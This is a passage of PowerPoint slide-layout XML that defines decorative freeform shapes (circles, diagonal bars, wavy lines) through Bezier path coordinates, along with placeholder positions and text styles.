                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6308575C-F1D0-446B-943D-7C46D816CC00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6689725" y="898525"/>
            <a:ext cx="401638" cy="403225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 206"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 206"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 206"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 206"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 206"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="73"/>
                  <a:pt x="206" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169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Freeform 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1587AEF-CE98-4A41-B4D6-242FDBC23ECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7896225" y="887413"/>
            <a:ext cx="401638" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 205"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 205"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 205"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 205"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 205"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="205" y="73"/>
                  <a:pt x="205" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169" y="36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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC34812-4101-42F9-8358-59FBD347197D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6465888" y="5314950"/>
            <a:ext cx="403225" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 206"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 206"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 206"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 206"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 206"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="73"/>
                  <a:pt x="206" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169" y="36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14"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-1038226"/>
            <a:ext cx="6738938" cy="3730625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4245"/>
              <a:gd name="T1" fmla="*/ 1381 h 2350"/>
              <a:gd name="T2" fmla="*/ 0 w 4245"/>
              <a:gd name="T3" fmla="*/ 1399 h 2350"/>
              <a:gd name="T4" fmla="*/ 846 w 4245"/>
              <a:gd name="T5" fmla="*/ 2245 h 2350"/>
              <a:gd name="T6" fmla="*/ 855 w 4245"/>
              <a:gd name="T7" fmla="*/ 2236 h 2350"/>
              <a:gd name="T8" fmla="*/ 0 w 4245"/>
              <a:gd name="T9" fmla="*/ 1381 h 2350"/>
              <a:gd name="T10" fmla="*/ 3763 w 4245"/>
              <a:gd name="T11" fmla="*/ 0 h 2350"/>
              <a:gd name="T12" fmla="*/ 3745 w 4245"/>
              <a:gd name="T13" fmla="*/ 0 h 2350"/>
              <a:gd name="T14" fmla="*/ 4227 w 4245"/>
              <a:gd name="T15" fmla="*/ 482 h 2350"/>
              <a:gd name="T16" fmla="*/ 2367 w 4245"/>
              <a:gd name="T17" fmla="*/ 2342 h 2350"/>
              <a:gd name="T18" fmla="*/ 2376 w 4245"/>
              <a:gd name="T19" fmla="*/ 2350 h 2350"/>
              <a:gd name="T20" fmla="*/ 4245 w 4245"/>
              <a:gd name="T21" fmla="*/ 482 h 2350"/>
              <a:gd name="T22" fmla="*/ 3763 w 4245"/>
              <a:gd name="T23" fmla="*/ 0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45" h="2350">
                <a:moveTo>
                  <a:pt x="0" y="1381"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="846" y="2245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855" y="2236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1381"/>
                </a:lnTo>
                <a:moveTo>
                  <a:pt x="3763" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3745" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4227" y="482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2367" y="2342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2376" y="2350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4245" y="482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37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2879324" y="2779088"/>
            <a:ext cx="6433352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spc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2879325" y="3350531"/>
            <a:ext cx="6433352" cy="767764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600" b="1" spc="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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A87E4A-B01F-4BC2-B340-8A24699EDB0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="630692" y="1649412"/>
            <a:ext cx="1257300" cy="1257300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 608 w 643"/>
              <a:gd name="T1" fmla="*/ 35 h 644"/>
              <a:gd name="T2" fmla="*/ 608 w 643"/>
              <a:gd name="T3" fmla="*/ 163 h 644"/>
              <a:gd name="T4" fmla="*/ 163 w 643"/>
              <a:gd name="T5" fmla="*/ 609 h 644"/>
              <a:gd name="T6" fmla="*/ 35 w 643"/>
              <a:gd name="T7" fmla="*/ 609 h 644"/>
              <a:gd name="T8" fmla="*/ 35 w 643"/>
              <a:gd name="T9" fmla="*/ 609 h 644"/>
              <a:gd name="T10" fmla="*/ 35 w 643"/>
              <a:gd name="T11" fmla="*/ 481 h 644"/>
              <a:gd name="T12" fmla="*/ 480 w 643"/>
              <a:gd name="T13" fmla="*/ 35 h 644"/>
              <a:gd name="T14" fmla="*/ 608 w 643"/>
              <a:gd name="T15" fmla="*/ 35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3" h="644">
                <a:moveTo>
                  <a:pt x="608" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="643" y="71"/>
                  <a:pt x="643" y="128"/>
                  <a:pt x="608" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="609"/>
                  <a:pt x="163" y="609"/>
                  <a:pt x="163" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="644"/>
                  <a:pt x="70" y="644"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="573"/>
                  <a:pt x="0" y="516"/>
                  <a:pt x="35" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="0"/>
                  <a:pt x="573" y="0"/>
                  <a:pt x="608" y="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5E885489-9BD7-446D-9889-5F82F2820A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124075"/>
            <a:ext cx="12192000" cy="28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3094446" y="2760886"/>
            <a:ext cx="7584213" cy="656792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2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3094446" y="3547042"/>
            <a:ext cx="7584213" cy="1015623"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg2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Freeform 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B53D691-F2F0-49F5-A5EC-68BA8E86BB44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1997982" y="1797050"/>
            <a:ext cx="654050" cy="654050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 328 w 335"/>
              <a:gd name="T1" fmla="*/ 56 h 335"/>
              <a:gd name="T2" fmla="*/ 299 w 335"/>
              <a:gd name="T3" fmla="*/ 57 h 335"/>
              <a:gd name="T4" fmla="*/ 274 w 335"/>
              <a:gd name="T5" fmla="*/ 57 h 335"/>
              <a:gd name="T6" fmla="*/ 274 w 335"/>
              <a:gd name="T7" fmla="*/ 82 h 335"/>
              <a:gd name="T8" fmla="*/ 273 w 335"/>
              <a:gd name="T9" fmla="*/ 110 h 335"/>
              <a:gd name="T10" fmla="*/ 245 w 335"/>
              <a:gd name="T11" fmla="*/ 111 h 335"/>
              <a:gd name="T12" fmla="*/ 220 w 335"/>
              <a:gd name="T13" fmla="*/ 111 h 335"/>
              <a:gd name="T14" fmla="*/ 220 w 335"/>
              <a:gd name="T15" fmla="*/ 136 h 335"/>
              <a:gd name="T16" fmla="*/ 219 w 335"/>
              <a:gd name="T17" fmla="*/ 165 h 335"/>
              <a:gd name="T18" fmla="*/ 190 w 335"/>
              <a:gd name="T19" fmla="*/ 166 h 335"/>
              <a:gd name="T20" fmla="*/ 166 w 335"/>
              <a:gd name="T21" fmla="*/ 166 h 335"/>
              <a:gd name="T22" fmla="*/ 166 w 335"/>
              <a:gd name="T23" fmla="*/ 190 h 335"/>
              <a:gd name="T24" fmla="*/ 165 w 335"/>
              <a:gd name="T25" fmla="*/ 219 h 335"/>
              <a:gd name="T26" fmla="*/ 136 w 335"/>
              <a:gd name="T27" fmla="*/ 220 h 335"/>
              <a:gd name="T28" fmla="*/ 111 w 335"/>
              <a:gd name="T29" fmla="*/ 220 h 335"/>
              <a:gd name="T30" fmla="*/ 111 w 335"/>
              <a:gd name="T31" fmla="*/ 245 h 335"/>
              <a:gd name="T32" fmla="*/ 110 w 335"/>
              <a:gd name="T33" fmla="*/ 273 h 335"/>
              <a:gd name="T34" fmla="*/ 82 w 335"/>
              <a:gd name="T35" fmla="*/ 274 h 335"/>
              <a:gd name="T36" fmla="*/ 57 w 335"/>
              <a:gd name="T37" fmla="*/ 274 h 335"/>
              <a:gd name="T38" fmla="*/ 57 w 335"/>
              <a:gd name="T39" fmla="*/ 299 h 335"/>
              <a:gd name="T40" fmla="*/ 56 w 335"/>
              <a:gd name="T41" fmla="*/ 328 h 335"/>
              <a:gd name="T42" fmla="*/ 27 w 335"/>
              <a:gd name="T43" fmla="*/ 329 h 335"/>
              <a:gd name="T44" fmla="*/ 3 w 335"/>
              <a:gd name="T45" fmla="*/ 329 h 335"/>
              <a:gd name="T46" fmla="*/ 0 w 335"/>
              <a:gd name="T47" fmla="*/ 326 h 335"/>
              <a:gd name="T48" fmla="*/ 28 w 335"/>
              <a:gd name="T49" fmla="*/ 325 h 335"/>
              <a:gd name="T50" fmla="*/ 53 w 335"/>
              <a:gd name="T51" fmla="*/ 325 h 335"/>
              <a:gd name="T52" fmla="*/ 53 w 335"/>
              <a:gd name="T53" fmla="*/ 300 h 335"/>
              <a:gd name="T54" fmla="*/ 54 w 335"/>
              <a:gd name="T55" fmla="*/ 272 h 335"/>
              <a:gd name="T56" fmla="*/ 83 w 335"/>
              <a:gd name="T57" fmla="*/ 271 h 335"/>
              <a:gd name="T58" fmla="*/ 107 w 335"/>
              <a:gd name="T59" fmla="*/ 271 h 335"/>
              <a:gd name="T60" fmla="*/ 108 w 335"/>
              <a:gd name="T61" fmla="*/ 246 h 335"/>
              <a:gd name="T62" fmla="*/ 109 w 335"/>
              <a:gd name="T63" fmla="*/ 217 h 335"/>
              <a:gd name="T64" fmla="*/ 137 w 335"/>
              <a:gd name="T65" fmla="*/ 216 h 335"/>
              <a:gd name="T66" fmla="*/ 162 w 335"/>
              <a:gd name="T67" fmla="*/ 216 h 335"/>
              <a:gd name="T68" fmla="*/ 162 w 335"/>
              <a:gd name="T69" fmla="*/ 192 h 335"/>
              <a:gd name="T70" fmla="*/ 163 w 335"/>
              <a:gd name="T71" fmla="*/ 163 h 335"/>
              <a:gd name="T72" fmla="*/ 192 w 335"/>
              <a:gd name="T73" fmla="*/ 162 h 335"/>
              <a:gd name="T74" fmla="*/ 216 w 335"/>
              <a:gd name="T75" fmla="*/ 162 h 335"/>
              <a:gd name="T76" fmla="*/ 216 w 335"/>
              <a:gd name="T77" fmla="*/ 137 h 335"/>
              <a:gd name="T78" fmla="*/ 217 w 335"/>
              <a:gd name="T79" fmla="*/ 109 h 335"/>
              <a:gd name="T80" fmla="*/ 246 w 335"/>
              <a:gd name="T81" fmla="*/ 107 h 335"/>
              <a:gd name="T82" fmla="*/ 271 w 335"/>
              <a:gd name="T83" fmla="*/ 107 h 335"/>
              <a:gd name="T84" fmla="*/ 271 w 335"/>
              <a:gd name="T85" fmla="*/ 83 h 335"/>
              <a:gd name="T86" fmla="*/ 272 w 335"/>
              <a:gd name="T87" fmla="*/ 54 h 335"/>
              <a:gd name="T88" fmla="*/ 300 w 335"/>
              <a:gd name="T89" fmla="*/ 53 h 335"/>
              <a:gd name="T90" fmla="*/ 325 w 335"/>
              <a:gd name="T91" fmla="*/ 53 h 335"/>
              <a:gd name="T92" fmla="*/ 325 w 335"/>
              <a:gd name="T93" fmla="*/ 28 h 335"/>
              <a:gd name="T94" fmla="*/ 326 w 335"/>
              <a:gd name="T95" fmla="*/ 0 h 335"/>
              <a:gd name="T96" fmla="*/ 329 w 335"/>
              <a:gd name="T97" fmla="*/ 3 h 335"/>
              <a:gd name="T98" fmla="*/ 329 w 335"/>
              <a:gd name="T99" fmla="*/ 27 h 335"/>
              <a:gd name="T100" fmla="*/ 328 w 335"/>
              <a:gd name="T101" fmla="*/ 56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5" h="335">
                <a:moveTo>
                  <a:pt x="328" y="56"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="63"/>
                  <a:pt x="309" y="60"/>
                  <a:pt x="299" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="290" y="54"/>
                  <a:pt x="280" y="51"/>
                  <a:pt x="274" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="269" y="63"/>
                  <a:pt x="271" y="72"/>
                  <a:pt x="274" y="82"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="92"/>
                  <a:pt x="281" y="103"/>
                  <a:pt x="273" y="110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="118"/>
                  <a:pt x="255" y="114"/>
                  <a:pt x="245" y="111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="235" y="108"/>
                  <a:pt x="226" y="105"/>
                  <a:pt x="220" y="111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="117"/>
                  <a:pt x="217" y="126"/>
                  <a:pt x="220" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="223" y="146"/>
                  <a:pt x="227" y="157"/>
                  <a:pt x="219" y="165"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="211" y="172"/>
                  <a:pt x="201" y="169"/>
                  <a:pt x="190" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="181" y="163"/>
                  <a:pt x="172" y="160"/>
                  <a:pt x="166" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="172"/>
                  <a:pt x="163" y="181"/>
                  <a:pt x="166" y="190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="201"/>
                  <a:pt x="172" y="211"/>
                  <a:pt x="165" y="219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="227"/>
                  <a:pt x="146" y="223"/>
                  <a:pt x="136" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="217"/>
                  <a:pt x="117" y="214"/>
                  <a:pt x="111" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="226"/>
                  <a:pt x="108" y="235"/>
                  <a:pt x="111" y="245"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="255"/>
                  <a:pt x="118" y="266"/>
                  <a:pt x="110" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103" y="281"/>
                  <a:pt x="92" y="278"/>
                  <a:pt x="82" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="271"/>
                  <a:pt x="63" y="268"/>
                  <a:pt x="57" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="280"/>
                  <a:pt x="54" y="289"/>
                  <a:pt x="57" y="299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="309"/>
                  <a:pt x="64" y="320"/>
                  <a:pt x="56" y="328"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="335"/>
                  <a:pt x="38" y="332"/>
                  <a:pt x="27" y="329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="326"/>
                  <a:pt x="9" y="323"/>
                  <a:pt x="3" y="329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="326"/>
                  <a:pt x="0" y="326"/>
                  <a:pt x="0" y="326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="318"/>
                  <a:pt x="18" y="322"/>
                  <a:pt x="28" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="328"/>
                  <a:pt x="47" y="331"/>
                  <a:pt x="53" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="319"/>
                  <a:pt x="56" y="310"/>
                  <a:pt x="53" y="300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="290"/>
                  <a:pt x="47" y="279"/>
                  <a:pt x="54" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="264"/>
                  <a:pt x="73" y="267"/>
                  <a:pt x="83" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="274"/>
                  <a:pt x="101" y="276"/>
                  <a:pt x="107" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="265"/>
                  <a:pt x="111" y="255"/>
                  <a:pt x="108" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="236"/>
                  <a:pt x="101" y="225"/>
                  <a:pt x="109" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="210"/>
                  <a:pt x="127" y="213"/>
                  <a:pt x="137" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147" y="219"/>
                  <a:pt x="156" y="222"/>
                  <a:pt x="162" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="210"/>
                  <a:pt x="165" y="201"/>
                  <a:pt x="162" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159" y="181"/>
                  <a:pt x="155" y="171"/>
                  <a:pt x="163" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="155"/>
                  <a:pt x="181" y="159"/>
                  <a:pt x="192" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="201" y="165"/>
                  <a:pt x="210" y="168"/>
                  <a:pt x="216" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="156"/>
                  <a:pt x="219" y="147"/>
                  <a:pt x="216" y="137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="127"/>
                  <a:pt x="210" y="116"/>
                  <a:pt x="217" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="225" y="101"/>
                  <a:pt x="236" y="104"/>
                  <a:pt x="246" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="110"/>
                  <a:pt x="265" y="113"/>
                  <a:pt x="271" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="101"/>
                  <a:pt x="274" y="92"/>
                  <a:pt x="271" y="83"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="72"/>
                  <a:pt x="264" y="62"/>
                  <a:pt x="272" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="279" y="47"/>
                  <a:pt x="290" y="50"/>
                  <a:pt x="300" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="56"/>
                  <a:pt x="319" y="59"/>
                  <a:pt x="325" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="47"/>
                  <a:pt x="328" y="38"/>
                  <a:pt x="325" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="322" y="18"/>
                  <a:pt x="318" y="7"/>
                  <a:pt x="326" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="3"/>
                  <a:pt x="329" y="3"/>
                  <a:pt x="329" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="323" y="9"/>
                  <a:pt x="326" y="18"/>
                  <a:pt x="329" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="332" y="38"/>
                  <a:pt x="335" y="48"/>
                  <a:pt x="328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22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08584396-C829-48F3-B33C-D10826D5833C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9072562" y="5445579"/>
            <a:ext cx="657225" cy="654050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 8 w 336"/>
              <a:gd name="T1" fmla="*/ 279 h 335"/>
              <a:gd name="T2" fmla="*/ 37 w 336"/>
              <a:gd name="T3" fmla="*/ 278 h 335"/>
              <a:gd name="T4" fmla="*/ 61 w 336"/>
              <a:gd name="T5" fmla="*/ 278 h 335"/>
              <a:gd name="T6" fmla="*/ 61 w 336"/>
              <a:gd name="T7" fmla="*/ 253 h 335"/>
              <a:gd name="T8" fmla="*/ 63 w 336"/>
              <a:gd name="T9" fmla="*/ 225 h 335"/>
              <a:gd name="T10" fmla="*/ 91 w 336"/>
              <a:gd name="T11" fmla="*/ 224 h 335"/>
              <a:gd name="T12" fmla="*/ 116 w 336"/>
              <a:gd name="T13" fmla="*/ 224 h 335"/>
              <a:gd name="T14" fmla="*/ 116 w 336"/>
              <a:gd name="T15" fmla="*/ 199 h 335"/>
              <a:gd name="T16" fmla="*/ 117 w 336"/>
              <a:gd name="T17" fmla="*/ 170 h 335"/>
              <a:gd name="T18" fmla="*/ 146 w 336"/>
              <a:gd name="T19" fmla="*/ 169 h 335"/>
              <a:gd name="T20" fmla="*/ 170 w 336"/>
              <a:gd name="T21" fmla="*/ 169 h 335"/>
              <a:gd name="T22" fmla="*/ 170 w 336"/>
              <a:gd name="T23" fmla="*/ 145 h 335"/>
              <a:gd name="T24" fmla="*/ 171 w 336"/>
              <a:gd name="T25" fmla="*/ 116 h 335"/>
              <a:gd name="T26" fmla="*/ 200 w 336"/>
              <a:gd name="T27" fmla="*/ 115 h 335"/>
              <a:gd name="T28" fmla="*/ 225 w 336"/>
              <a:gd name="T29" fmla="*/ 115 h 335"/>
              <a:gd name="T30" fmla="*/ 225 w 336"/>
              <a:gd name="T31" fmla="*/ 90 h 335"/>
              <a:gd name="T32" fmla="*/ 226 w 336"/>
              <a:gd name="T33" fmla="*/ 62 h 335"/>
              <a:gd name="T34" fmla="*/ 254 w 336"/>
              <a:gd name="T35" fmla="*/ 61 h 335"/>
              <a:gd name="T36" fmla="*/ 279 w 336"/>
              <a:gd name="T37" fmla="*/ 60 h 335"/>
              <a:gd name="T38" fmla="*/ 279 w 336"/>
              <a:gd name="T39" fmla="*/ 36 h 335"/>
              <a:gd name="T40" fmla="*/ 280 w 336"/>
              <a:gd name="T41" fmla="*/ 7 h 335"/>
              <a:gd name="T42" fmla="*/ 309 w 336"/>
              <a:gd name="T43" fmla="*/ 6 h 335"/>
              <a:gd name="T44" fmla="*/ 333 w 336"/>
              <a:gd name="T45" fmla="*/ 6 h 335"/>
              <a:gd name="T46" fmla="*/ 336 w 336"/>
              <a:gd name="T47" fmla="*/ 9 h 335"/>
